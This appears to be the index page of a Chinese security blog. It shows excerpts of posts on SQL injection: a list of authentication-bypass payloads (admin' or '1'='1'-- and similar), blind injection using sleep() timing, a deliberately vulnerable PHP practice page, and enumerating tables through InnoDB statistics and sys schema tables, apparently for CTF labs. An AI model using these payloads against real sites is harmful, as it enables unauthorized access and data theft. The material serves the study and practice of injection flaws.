火柴人的博客

' or ''-' " or ""-" " or true-- ' or true-- admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin'...

0x00盲注的一般模式 1.and 0 mysql> select * from bsqli where id = 1 and 1(payload结果) and sleep(1); Empty set (1.00 sec) mysql> select * from bsqli where id = 1 and 0(payload结果) and sleep(1); Empty set ...

一.环境搭建 先自己创建两个数据表。 这个是我们需要查询的数据表。 自己搭建一个极其简单的sql查询网页。 环境代码： #sql.php <!DOCTYPE html> <html> <head> <title>ezsqli</title> </head> <body> <form action...

总览 从MySQL 5.5开始，默认存储引擎称为InnoDB。在MySQL 5.5及更高版本中，如果执行“ select @@ innodb_version”，则可以看到InnoDB的版本，该版本与MySQL的版本几乎相同。 但是在MySQL 5.6及更高版本中，我注意到InnoDB创建了2个新表。“ innodb_index_stats”和“ innodb_table_stats”。这两个表都...

Sys 这些实验在MySQL 5.7.9 mysql> SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE(); +-------------+ | object_name | +-------------+ | emails | | flag ...